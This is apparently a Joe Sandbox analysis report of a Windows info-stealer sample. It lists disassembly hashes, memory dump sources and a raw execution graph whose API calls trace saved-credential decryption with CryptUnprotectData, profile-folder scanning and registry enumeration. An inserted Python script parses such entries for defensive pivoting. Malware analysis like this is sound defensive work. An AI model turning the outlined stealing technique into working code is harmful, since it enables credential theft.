                                                      • Instruction ID: 97fbfc2c6fc37da3919b67f1be8fc0a0df2ff60c0ded757b2ccd919d026c4071
                                                      • Opcode Fuzzy Hash: 032cb9975b8c38365436980e707c95e20df0feb425b0ad43c6c243ff31604d4f
                                                      • Instruction Fuzzy Hash: 49114E316103049FD347B778E8507A53BB9EB4B721F4680AAD415CB367DB64DC018BA1
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.419686380.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_390000_gwseuha.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 40c1e6799d128e6716e2aeca5f60e314bb681617e43ede9bc9d8d9b0c8b7d5e6
                                                      • Instruction ID: 2f0cd4053205eebb5e0bb32a0e2f4b027c64e4fc9ce59ec4ef89cd998bf5e483
                                                      • Opcode Fuzzy Hash: 40c1e6799d128e6716e2aeca5f60e314bb681617e43ede9bc9d8d9b0c8b7d5e6
                                                      • Instruction Fuzzy Hash: 2202C2306007569FCB15DF68C880AAEBBF2FF88300B15C968D955AB395DB71ED46CB90
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.419686380.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_390000_gwseuha.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dc0530bfac1eae9eae19c82797f216b06a3de9eb3932a2912467f990fd396d9f
                                                      • Instruction ID: d52bd0d7dbc9aeffa460a0f123923d06f4abccdd69d8e078be6f1e6a1c41bb6a
                                                      • Opcode Fuzzy Hash: dc0530bfac1eae9eae19c82797f216b06a3de9eb3932a2912467f990fd396d9f
                                                      • Instruction Fuzzy Hash: 42D14C34214302CFDB0EDF24D944B697BB6BF89300F658868E8568B765DB79ED41CB90
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.419686380.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_390000_gwseuha.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f70a115037b3a86f72fa1bfd4cb7929bcce809e9eccfaef2191db6ae3ccf9e63
                                                      • Instruction ID: 2b896c141344fdcd7707bd1b7db8dba4c50754a8640bc07c11f8e054b386b3ee
                                                      • Opcode Fuzzy Hash: f70a115037b3a86f72fa1bfd4cb7929bcce809e9eccfaef2191db6ae3ccf9e63
                                                      • Instruction Fuzzy Hash: 6B817E70A0064ADFCB15DFA4C880AAEB7F2FF88300F258669D555AB395D731ED46CB90
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.419686380.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_390000_gwseuha.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fff3cec5c8b0362f17b5d2f003bea61496399975f7510d077bdf48792b6249ee
                                                      • Instruction ID: f8ec019877d008540400efd4bf8b19a6f283265f23291964960628d7bbaab946
                                                      • Opcode Fuzzy Hash: fff3cec5c8b0362f17b5d2f003bea61496399975f7510d077bdf48792b6249ee
                                                      • Instruction Fuzzy Hash: 4C11C431B10204AFC715ABB9E81479D7BB6EF89700F1580BAE609DB395DB749D02CB91
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.419686380.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_390000_gwseuha.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d70f3e690ece4785d4b5ee74df3020a530a2dbfc9c31f15d086522b7f9e0b3e3
                                                      • Instruction ID: cca7de90434a645e359986cd40b7d0ccfcc41941a28a8c7c8364efba7974a19f
                                                      • Opcode Fuzzy Hash: d70f3e690ece4785d4b5ee74df3020a530a2dbfc9c31f15d086522b7f9e0b3e3
                                                      • Instruction Fuzzy Hash: AD012B7B710611DFCB26AB25EC84D2B3BF4EBC9B503028518EC429B719DA74DC01C7A0
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.419686380.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_390000_gwseuha.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9bdd1bebd39cb0dbd0392c18f4a152784fb1c98417bf9b6d52d94d83b6167117
                                                      • Instruction ID: 543dcfab2a552c6fcf44c61e7848c33f0b5ed4afc16a1ac6e4ff76c9136de3f7
                                                      • Opcode Fuzzy Hash: 9bdd1bebd39cb0dbd0392c18f4a152784fb1c98417bf9b6d52d94d83b6167117
                                                      • Instruction Fuzzy Hash: 8BF052727053202FD30917786C10AAF3BBEEFCA22031805BAE409CB342ED748C0683E0
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.419686380.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_390000_gwseuha.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 478a8bd76b7f6ec3d175d683f57bd366430e732a0ad4099c3e388fbc8423359b
                                                      • Instruction ID: 476ad30b240ad5d9bdbbcc747a13f549afe5d36a114d43719d45744bd8496f8f
                                                      • Opcode Fuzzy Hash: 478a8bd76b7f6ec3d175d683f57bd366430e732a0ad4099c3e388fbc8423359b
                                                      • Instruction Fuzzy Hash: 78F0E53160C289AFC706CFB59C484DA7FF9EF0661070580EFE448C3112E6705C048761
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.419686380.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_390000_gwseuha.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1767142fbbb1894315af9c54233d9df70006003800629abef5c2345af41ae78b
                                                      • Instruction ID: d28cd6b0f371b85e26c286f310e1bcbc017d856e9e7126aa01cf0c030a060eb2
                                                      • Opcode Fuzzy Hash: 1767142fbbb1894315af9c54233d9df70006003800629abef5c2345af41ae78b
                                                      • Instruction Fuzzy Hash: DBE09232B04109AF9B08EFF9F9484DE7FEDFB48722B00C07AE009D3610EA7458808790
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.419686380.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_390000_gwseuha.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 28a0b0e71895c7a187a6778f85b3e5dcdd639e8bd8d3163193a5f63333206200
                                                      • Instruction ID: 47f3745736c951596695a43dd6685011cc7f4d0c00b396bc6f47e970477a4514
                                                      • Opcode Fuzzy Hash: 28a0b0e71895c7a187a6778f85b3e5dcdd639e8bd8d3163193a5f63333206200
                                                      • Instruction Fuzzy Hash: BCE0C234118380CFDB0AAF35FA28AE53FF5AB4A304B4580E9E8818B667D6785C80CB55
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.419686380.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_390000_gwseuha.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9f75dd602ac67d610a08db3a1f0f7510e1e66880032a9d66fde53dc58cf9e3d5
                                                      • Instruction ID: a32dc82c42da3f11fca8f9969e510747966fc7f1eaa2e0361d727a614880dc22
                                                      • Opcode Fuzzy Hash: 9f75dd602ac67d610a08db3a1f0f7510e1e66880032a9d66fde53dc58cf9e3d5
                                                      • Instruction Fuzzy Hash: 7DD0A732B49A55ABCB0A52B5AD092CC3F348B46250B8940BBD544D7192F604891483D2
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.419686380.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_390000_gwseuha.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 919b6136d14028392384b75bb960da8b63eddf52f06f8e1c712960827e400835
                                                      • Instruction ID: fc13aea607f6517d3ae1ad7a5fe43cd5aab78ead9810f44acc401bddb88b87c8
                                                      • Opcode Fuzzy Hash: 919b6136d14028392384b75bb960da8b63eddf52f06f8e1c712960827e400835
                                                      • Instruction Fuzzy Hash: B7C012A84492C11EEB171730A8283A03F711B87204F8B50CAC0C1678B3E4980864C326
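The per-function entries above share a fixed field layout: an APIs list (direct calls and "Part of subcall function" calls), the memory dump source, the snapshot file, and the similarity fields ending in the instruction fuzzy hash. The Python below is an added example, not part of the Joe Sandbox report or of the sample's code: it parses entries in that layout into records, cross-checks the process index encoded in hex at the start of the .sdmp name against the decimal index in the hcaresult_ snapshot name, and indexes functions by imported API so a pattern such as ResumeThread together with SleepEx can be located and its Opcode ID carried to other reports. The three entries in SAMPLE_REPORT are constructed in the shape of the entries above; their Opcode ID and fuzzy-hash values are shortened placeholders.

```python
import re
from collections import defaultdict

# Constructed sample in the shape of the per-function entries above (APIs list,
# dump source, snapshot file, similarity fields). Opcode ID and fuzzy-hash
# values are shortened placeholders, not values from any report.
SAMPLE_REPORT = """\
APIs
• Part of subcall function 028032EC: CreateFileW.KERNEL32 ref: 02803332
• Part of subcall function 028032EC: ReadFile.KERNEL32 ref: 02803379
• ResumeThread.KERNEL32 ref: 02802EFE
• SleepEx.KERNEL32(?,?,?,?,?,?,?,02801973), ref: 02802F43
Memory Dump Source
• Source File: 0000000C.00000002.629839810.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
• Snapshot File: hcaresult_12_2_2801000_explorer.jbxd
• API ID: File$CreateReadResumeSleepThread
• String ID:
• Opcode ID: aaaa0001
• Instruction Fuzzy Hash: FD719A34308F499F
APIs
• GetVolumeInformationA.KERNEL32 ref: 02804CFD
• Part of subcall function 02805174: CryptAcquireContextA.ADVAPI32 ref: 028051A9
Memory Dump Source
• Source File: 0000000C.00000002.629839810.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
• Snapshot File: hcaresult_12_2_2801000_explorer.jbxd
• API ID: AcquireContextCryptInformationVolume
• String ID:
• Opcode ID: aaaa0002
• Instruction Fuzzy Hash: 2D318E34618B4C8F
Strings
Memory Dump Source
• Source File: 00000011.00000002.419686380.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
• Snapshot File: hcaresult_17_2_390000_gwseuha.jbxd
• API ID:
• String ID: tPp
• Opcode ID: aaaa0003
• Instruction Fuzzy Hash: EC210C353006118F
"""

# "• Api.MODULE ref: addr" or "• Part of subcall function X: Api.MODULE(...), ref: addr"
API_LINE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\([^)]*\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
FIELD_LINE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")
SNAPSHOT = re.compile(r"^hcaresult_(?P<pid>\d+)_\d+_[0-9A-Fa-f]+_(?P<proc>.+)\.jbxd$")


def parse_entries(text):
    """One dict per function entry; an entry ends at its Instruction Fuzzy Hash
    line, the last field Joe Sandbox prints for a function."""
    entries, cur = [], {"apis": []}
    for raw in text.splitlines():
        line = raw.strip()
        m = API_LINE.match(line)
        if m:
            cur["apis"].append({"api": m["api"], "module": m["mod"],
                                "ref": int(m["ref"], 16),
                                "via_subcall": int(m["sub"], 16) if m["sub"] else None})
            continue
        m = FIELD_LINE.match(line)
        if not m:
            continue  # section headings such as "APIs" or "Memory Dump Source"
        key, val = m["key"].strip(), m["val"].strip()
        if key == "Source File":
            # First dotted field of the .sdmp name is the process index, in hex.
            cur["source_file"] = val.split(",", 1)[0]
            cur["dump_pid"] = int(cur["source_file"].split(".", 1)[0], 16)
        elif key == "Snapshot File":
            s = SNAPSHOT.match(val)
            cur["snapshot_pid"] = int(s["pid"]) if s else None  # decimal here
            cur["process"] = s["proc"] if s else val
        else:
            cur[key.lower().replace(" ", "_")] = val
        if key == "Instruction Fuzzy Hash":
            entries.append(cur)
            cur = {"apis": []}
    return entries


def api_index(entries):
    """Map each imported API to the sorted Opcode IDs of functions calling it,
    directly or through a subcall; Opcode IDs are the pivot key across reports."""
    idx = defaultdict(set)
    for e in entries:
        for a in e["apis"]:
            idx[a["api"]].add(e["opcode_id"])
    return {k: sorted(v) for k, v in idx.items()}


def functions_calling(entries, *apis):
    """Opcode IDs of functions that call every API named."""
    idx = api_index(entries)
    return sorted(set.intersection(*[set(idx.get(a, [])) for a in apis])) if apis else []


def dump_snapshot_mismatches(entries):
    """Opcode IDs whose .sdmp process index (hex) disagrees with the snapshot
    file's process index (decimal): a sign of a mis-associated dump."""
    return [e["opcode_id"] for e in entries if e.get("dump_pid") != e.get("snapshot_pid")]


if __name__ == "__main__":
    found = parse_entries(SAMPLE_REPORT)
    print(len(found), "functions;", len(api_index(found)), "distinct APIs")
    print("ResumeThread+SleepEx:", functions_calling(found, "ResumeThread", "SleepEx"))
    print("dump/snapshot mismatches:", dump_snapshot_mismatches(found))
```

Feed the text of a real report's disassembly section to parse_entries in place of SAMPLE_REPORT; the Opcode IDs returned by functions_calling are the stable key to search for in other reports, since they survive relocation of the injected region while the block addresses do not.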

                                                      Execution Graph

                                                      Execution Coverage:2.5%
                                                      Dynamic/Decrypted Code Coverage:53.7%
                                                      Signature Coverage:16.3%
                                                      Total number of Nodes:583
                                                      Total number of Limit Nodes:29
Rendered execution graph omitted. Functions and API calls recoverable from the node list (addresses as printed in the graph; the node list is cut off in the page at node 27755):
• ca40e: ReadFile, memcpy, memset
• c4406 -> c2e30: StrStrIW, RegOpenKeyExW, RegEnumKeyExW, RegCloseKey, recursing into c2e30; helpers c1000 (GetProcessHeap, RtlAllocateHeap) and c1011 (GetProcessHeap, HeapFree, VirtualQuery)
• c3c40: GetTempPathW, GetTempFileNameW, DeleteFileW, CopyFileW, lstrlen, wsprintfA, lstrcat; reaches 114bec (memset) and, through it, cbfec (GetSystemInfo)
• c3098: GetTempPathW, GetTempFileNameW, DeleteFileW, CopyFileW, RtlCompareMemory, RtlZeroMemory, CryptUnprotectData
• c24a4 -> c2198: RtlZeroMemory, GetVersionExW, LoadLibraryW, GetProcAddress (five times), RtlCompareMemory, StrStrIW, FreeLibrary
• 129238: LoadLibraryA, GetProcAddress, VirtualProtect (twice)
• c9ea7: RtlAllocateHeap; c9ee8: HeapFree; c105d: VirtualFree; c4cf5: memset; 105401: memset, memcpy
• Arithmetic helpers only (_allmul, _alldiv, _allrem, _alldvrm): cca01, c581f, c56a2, c96bc, e0670, e069d, e12bb; efaca: _allmul, strcspn
• Nodes summarised by the tool only as "N API calls" (for example e0e0c, f9000, fe024, e13ca, c28f8, f9ef6): no API names recoverable
27754->27755 27756 c3fdc 50 API calls 27755->27756 27757 c40c6 27756->27757 27758 c3fdc 50 API calls 27757->27758 27759 c40d9 27758->27759 27760 c3fdc 50 API calls 27759->27760 27761 c40ec 27760->27761 27762 c3fdc 50 API calls 27761->27762 27763 c40ff 27762->27763 27775 c1afe 27764->27775 27767 c403f 27767->27748 27771 c4038 27838 c1011 27771->27838 27843 c1000 GetProcessHeap RtlAllocateHeap 27775->27843 27777 c1b0d SHGetFolderPathW 27778 c1b63 27777->27778 27779 c1b20 27777->27779 27778->27767 27783 c199d 27778->27783 27780 c1011 3 API calls 27779->27780 27782 c1b28 27780->27782 27782->27778 27844 c19e5 27782->27844 27859 c1953 27783->27859 27785 c19a6 27786 c1011 3 API calls 27785->27786 27787 c19af 27786->27787 27788 c3ed9 27787->27788 27789 c3eed 27788->27789 27790 c3fd1 27788->27790 27789->27790 27865 c1000 GetProcessHeap RtlAllocateHeap 27789->27865 27790->27771 27810 c1d4a 27790->27810 27792 c3f01 PathCombineW FindFirstFileW 27793 c3fca 27792->27793 27794 c3f27 27792->27794 27797 c1011 3 API calls 27793->27797 27795 c3f78 lstrcmpiW 27794->27795 27796 c3f32 lstrcmpiW 27794->27796 27866 c1000 GetProcessHeap RtlAllocateHeap 27794->27866 27795->27794 27798 c3faf FindNextFileW 27795->27798 27796->27798 27799 c3f42 lstrcmpiW 27796->27799 27797->27790 27798->27794 27801 c3fc3 FindClose 27798->27801 27799->27798 27802 c3f56 27799->27802 27801->27793 27883 c1000 GetProcessHeap RtlAllocateHeap 27802->27883 27803 c3f92 PathCombineW 27867 c3e04 27803->27867 27806 c3f60 PathCombineW 27808 c3ed9 23 API calls 27806->27808 27807 c3f76 27809 c1011 3 API calls 27807->27809 27808->27807 27809->27798 27811 c1eb4 27810->27811 27812 c1d62 27810->27812 27811->27771 27812->27811 27915 c19b4 27812->27915 27815 c1d79 27817 c1953 6 API calls 27815->27817 27816 c1d8b 27818 c1953 6 API calls 27816->27818 27819 c1d83 27817->27819 27818->27819 27819->27811 27820 c1da3 FindFirstFileW 27819->27820 27821 c1ead 27820->27821 27828 c1dba 27820->27828 27822 c1011 3 API calls 27821->27822 
27822->27811 27823 c1dc5 lstrcmpiW 27825 c1ddd lstrcmpiW 27823->27825 27826 c1e8e FindNextFileW 27823->27826 27824 c1953 6 API calls 27824->27828 27825->27826 27835 c1df5 27825->27835 27827 c1ea2 FindClose 27826->27827 27826->27828 27827->27821 27828->27823 27828->27824 27829 c199d 9 API calls 27828->27829 27831 c1e54 lstrcmpiW 27829->27831 27830 c19b4 lstrlenW 27830->27835 27831->27835 27833 c1011 3 API calls 27833->27826 27834 c1953 6 API calls 27834->27835 27835->27830 27835->27833 27835->27834 27836 c199d 9 API calls 27835->27836 27837 c1d4a 12 API calls 27835->27837 27919 c1cf7 GetProcessHeap RtlAllocateHeap lstrlenW RtlComputeCrc32 27835->27919 27836->27835 27837->27835 27920 c1162 VirtualQuery 27838->27920 27841 c102d 27841->27767 27842 c101d GetProcessHeap HeapFree 27842->27841 27843->27777 27845 c19fa RegOpenKeyExW 27844->27845 27846 c19f7 27844->27846 27847 c1a28 RegQueryValueExW 27845->27847 27848 c1aa2 27845->27848 27846->27845 27850 c1a94 RegCloseKey 27847->27850 27851 c1a46 27847->27851 27849 c1ab9 27848->27849 27852 c19e5 5 API calls 27848->27852 27849->27782 27850->27848 27850->27849 27851->27850 27858 c1000 GetProcessHeap RtlAllocateHeap 27851->27858 27852->27849 27854 c1a61 RegQueryValueExW 27855 c1a7f 27854->27855 27856 c1a8b 27854->27856 27855->27850 27857 c1011 3 API calls 27856->27857 27857->27855 27858->27854 27860 c1964 lstrlenW lstrlenW 27859->27860 27864 c1000 GetProcessHeap RtlAllocateHeap 27860->27864 27863 c1986 lstrcatW lstrcatW 27863->27785 27864->27863 27865->27792 27866->27803 27884 c1b6a 27867->27884 27869 c3e0f 27874 c3ec7 27869->27874 27890 c1c31 CreateFileW 27869->27890 27874->27807 27877 c3ebf 27878 c1011 3 API calls 27877->27878 27878->27874 27879 c3e6c RtlCompareMemory 27880 c3ea8 27879->27880 27881 c3e7e CryptUnprotectData 27879->27881 27882 c1011 3 API calls 27880->27882 27881->27880 27882->27877 27883->27806 27885 c1b6f 27884->27885 27886 c1b99 27884->27886 27885->27886 27887 c1b76 CreateFileW 27885->27887 27886->27869 
27888 c1b8d CloseHandle 27887->27888 27889 c1b95 27887->27889 27888->27889 27889->27869 27891 c1c98 27890->27891 27892 c1c53 GetFileSize 27890->27892 27891->27874 27900 c2fb1 27891->27900 27893 c1c90 CloseHandle 27892->27893 27894 c1c63 27892->27894 27893->27891 27912 c1000 GetProcessHeap RtlAllocateHeap 27894->27912 27896 c1c6b ReadFile 27897 c1c80 27896->27897 27897->27893 27898 c1011 3 API calls 27897->27898 27899 c1c8e 27898->27899 27899->27893 27901 c2fb8 StrStrIA 27900->27901 27903 c2ff2 27900->27903 27902 c2fcd lstrlen StrStrIA 27901->27902 27901->27903 27902->27903 27904 c2fe7 27902->27904 27903->27874 27906 c123b lstrlen 27903->27906 27913 c190b 6 API calls 27904->27913 27907 c129b 27906->27907 27908 c1256 CryptStringToBinaryA 27906->27908 27907->27877 27907->27879 27907->27880 27908->27907 27909 c1272 27908->27909 27914 c1000 GetProcessHeap RtlAllocateHeap 27909->27914 27911 c127e CryptStringToBinaryA 27911->27907 27912->27896 27913->27903 27914->27911 27916 c19bc 27915->27916 27918 c19d4 27915->27918 27917 c19c3 lstrlenW 27916->27917 27916->27918 27917->27918 27918->27815 27918->27816 27919->27835 27921 c1019 27920->27921 27921->27841 27921->27842 28490 e5f08 92 API calls 28396 114116 30 API calls 28492 f6f06 24 API calls 28397 d84a7 30 API calls 28224 129304 28226 129344 28224->28226 28225 129584 28225->28225 28226->28225 28227 1294da LoadLibraryA 28226->28227 28231 12951f VirtualProtect VirtualProtect 28226->28231 28228 1294f1 28227->28228 28228->28226 28230 129503 GetProcAddress 28228->28230 28230->28228 28232 129519 28230->28232 28231->28225 28249 c411b 28250 c4045 50 API calls 28249->28250 28251 c412b 28250->28251 28252 c4045 50 API calls 28251->28252 28253 c413b 28252->28253 28496 c2b15 50 API calls 28497 e6b14 memset memcpy _allmul 28257 c3717 28258 c1b6a 2 API calls 28257->28258 28259 c372e 28258->28259 28260 c3c23 28259->28260 28307 c1000 GetProcessHeap RtlAllocateHeap 28259->28307 28262 c376c GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 
28263 c379e 28262->28263 28264 c37a8 28262->28264 28308 c349b 31 API calls 28263->28308 28266 114bec 79 API calls 28264->28266 28269 c37b3 28266->28269 28267 c3c15 DeleteFileW 28268 c1011 3 API calls 28267->28268 28268->28260 28269->28267 28270 c3c0c 28269->28270 28309 c1000 GetProcessHeap RtlAllocateHeap 28269->28309 28319 113848 66 API calls 28270->28319 28273 c37e3 28310 e02ec 84 API calls 28273->28310 28275 c3bcc 28315 dfb92 83 API calls 28275->28315 28277 c3bd9 lstrlen 28279 c3c05 28277->28279 28280 c3be5 28277->28280 28278 c1fa7 19 API calls 28301 c37ee 28278->28301 28282 c1011 3 API calls 28279->28282 28316 c1798 lstrlen 28280->28316 28282->28270 28284 c3bf3 28317 c1798 lstrlen 28284->28317 28285 c3a37 CryptUnprotectData 28285->28301 28286 c3833 RtlCompareMemory 28286->28285 28286->28301 28288 c3bfc 28318 c1798 lstrlen 28288->28318 28290 c3867 RtlZeroMemory 28311 c1000 GetProcessHeap RtlAllocateHeap 28290->28311 28292 c1011 3 API calls 28292->28301 28293 c3b0f lstrlen 28294 c3b21 lstrlen 28293->28294 28293->28301 28294->28301 28295 c1000 GetProcessHeap RtlAllocateHeap 28295->28301 28296 c3987 lstrlen 28299 c3999 lstrlen 28296->28299 28296->28301 28298 c3b66 wsprintfA lstrlen 28300 c3ba3 lstrcat 28298->28300 28298->28301 28299->28301 28300->28301 28301->28275 28301->28278 28301->28285 28301->28286 28301->28290 28301->28292 28301->28293 28301->28295 28301->28296 28301->28300 28312 c2112 GetProcessHeap RtlAllocateHeap GetSystemTimeAsFileTime _alldiv wsprintfA 28301->28312 28313 c2112 GetProcessHeap RtlAllocateHeap GetSystemTimeAsFileTime _alldiv wsprintfA 28301->28313 28314 e02ec 84 API calls 28301->28314 28303 c39de wsprintfA lstrlen 28304 c3a1b lstrcat 28303->28304 28305 c3a0d 28303->28305 28306 c1011 3 API calls 28304->28306 28305->28304 28306->28301 28307->28262 28308->28264 28309->28273 28310->28301 28311->28301 28312->28303 28313->28298 28314->28301 28315->28277 28316->28284 28317->28288 28318->28279 28319->28267 28498 f072d 19 API calls 28399 d0128 23 
API calls 28499 ccb2a _allmul _allmul 28401 c9925 18 API calls 28502 d7b3d 18 API calls 28161 c413e 28162 c4045 50 API calls 28161->28162 28163 c414e 28162->28163 28503 10c322 27 API calls 28505 d0f3e 50 API calls 28404 d9534 39 API calls 28405 ef130 22 API calls 28508 dff32 21 API calls 28509 df74d 18 API calls 28510 e6340 82 API calls 28407 ee141 18 API calls 28408 ca558 18 API calls 28409 ee558 22 API calls 28410 f5d6f 20 API calls 28411 da16f 33 API calls 28514 cab68 20 API calls 28516 e7f67 24 API calls 28518 f7762 memset memset memcpy 28413 dc97b memcpy 28320 c2f77 28321 c2e30 22 API calls 28320->28321 28322 c2f9a 28321->28322 28323 c2e30 22 API calls 28322->28323 28324 c2fab 28323->28324 28416 e7d8b _allrem memcpy 28519 dab8b 19 API calls 28522 c1b9d GetFileAttributesW 28417 c1198 GetProcessHeap RtlAllocateHeap CryptBinaryToStringA CryptBinaryToStringA 28523 cbf9a _alldiv 28418 dfd97 19 API calls 28524 e13ca 78 API calls 28526 dcb91 18 API calls 28528 1033b7 27 API calls 28529 e8ba6 7 API calls 28421 d11a0 33 API calls 28422 e9dbc 25 API calls 28530 e13ca 79 API calls 28531 1053ad memset memcpy memset memcpy 27928 c9fc8 27929 c9fd3 27928->27929 27931 c9fd8 27928->27931 27930 c9ff4 HeapCreate 27930->27929 27932 ca004 27930->27932 27931->27929 27931->27930 27934 c7f70 17 API calls 27932->27934 27934->27929 28535 e13ca 79 API calls 28536 f73c4 22 API calls 28087 c15dd 28088 c1600 28087->28088 28089 c15f3 lstrlen 28087->28089 28098 c1000 GetProcessHeap RtlAllocateHeap 28088->28098 28089->28088 28091 c1608 lstrcat 28092 c163d lstrcat 28091->28092 28093 c1644 28091->28093 28092->28093 28099 c1333 28093->28099 28096 c1011 3 API calls 28097 c1667 28096->28097 28098->28091 28122 c1000 GetProcessHeap RtlAllocateHeap 28099->28122 28101 c1357 28123 c106c lstrlen MultiByteToWideChar 28101->28123 28103 c1366 28124 c12a3 RtlZeroMemory 28103->28124 28106 c13b8 RtlZeroMemory 28110 c13ed 28106->28110 28107 c1011 3 API calls 28108 c15d2 28107->28108 28108->28096 28109 c15b5 
28109->28107 28110->28109 28126 c1000 GetProcessHeap RtlAllocateHeap 28110->28126 28112 c14a7 wsprintfW 28113 c14c9 28112->28113 28121 c15a1 28113->28121 28127 c1000 GetProcessHeap RtlAllocateHeap 28113->28127 28114 c1011 3 API calls 28114->28109 28116 c159a 28119 c1011 3 API calls 28116->28119 28117 c1533 28117->28116 28128 c104c VirtualAlloc 28117->28128 28119->28121 28120 c158a RtlMoveMemory 28120->28116 28121->28114 28122->28101 28123->28103 28125 c12c5 28124->28125 28125->28106 28125->28109 28126->28112 28127->28117 28128->28120 28129 c63dd 28132 cb87b 28129->28132 28130 c63f4 28133 cb88d memset 28132->28133 28136 cb8e5 28133->28136 28136->28133 28137 cba3c 28136->28137 28138 cb965 CreateFileW 28136->28138 28141 cba14 28136->28141 28142 cba41 28136->28142 28147 cb609 28136->28147 28150 cb64b 18 API calls 28136->28150 28151 cbb9f 18 API calls 28136->28151 28152 ca2aa 17 API calls 28136->28152 28137->28130 28138->28136 28153 ca1c6 18 API calls 28141->28153 28155 1152ae _allmul 28142->28155 28144 cba32 28154 114db2 17 API calls 28144->28154 28156 ca08a 28147->28156 28149 cb60f 28149->28136 28150->28136 28151->28136 28152->28136 28153->28144 28154->28137 28155->28137 28157 ca0a4 28156->28157 28159 ca0aa 28157->28159 28160 c6a81 memset 28157->28160 28159->28149 28160->28159 28194 c43d9 28201 c4317 _alloca_probe RegOpenKeyW 28194->28201 28197 c4317 25 API calls 28198 c43f5 28197->28198 28199 c4317 25 API calls 28198->28199 28200 c4403 28199->28200 28202 c43cf 28201->28202 28203 c4343 RegEnumKeyExW 28201->28203 28202->28197 28204 c436d 28203->28204 28205 c43c4 RegCloseKey 28203->28205 28206 c1953 6 API calls 28204->28206 28207 c199d 9 API calls 28204->28207 28209 c1011 3 API calls 28204->28209 28212 c418a 28204->28212 28205->28202 28206->28204 28207->28204 28210 c439b RegEnumKeyExW 28209->28210 28210->28204 28211 c43c3 28210->28211 28211->28205 28213 c430d 28212->28213 28220 c41a3 28212->28220 28213->28204 28214 c19e5 9 API calls 28214->28220 28216 c4205 wsprintfW 
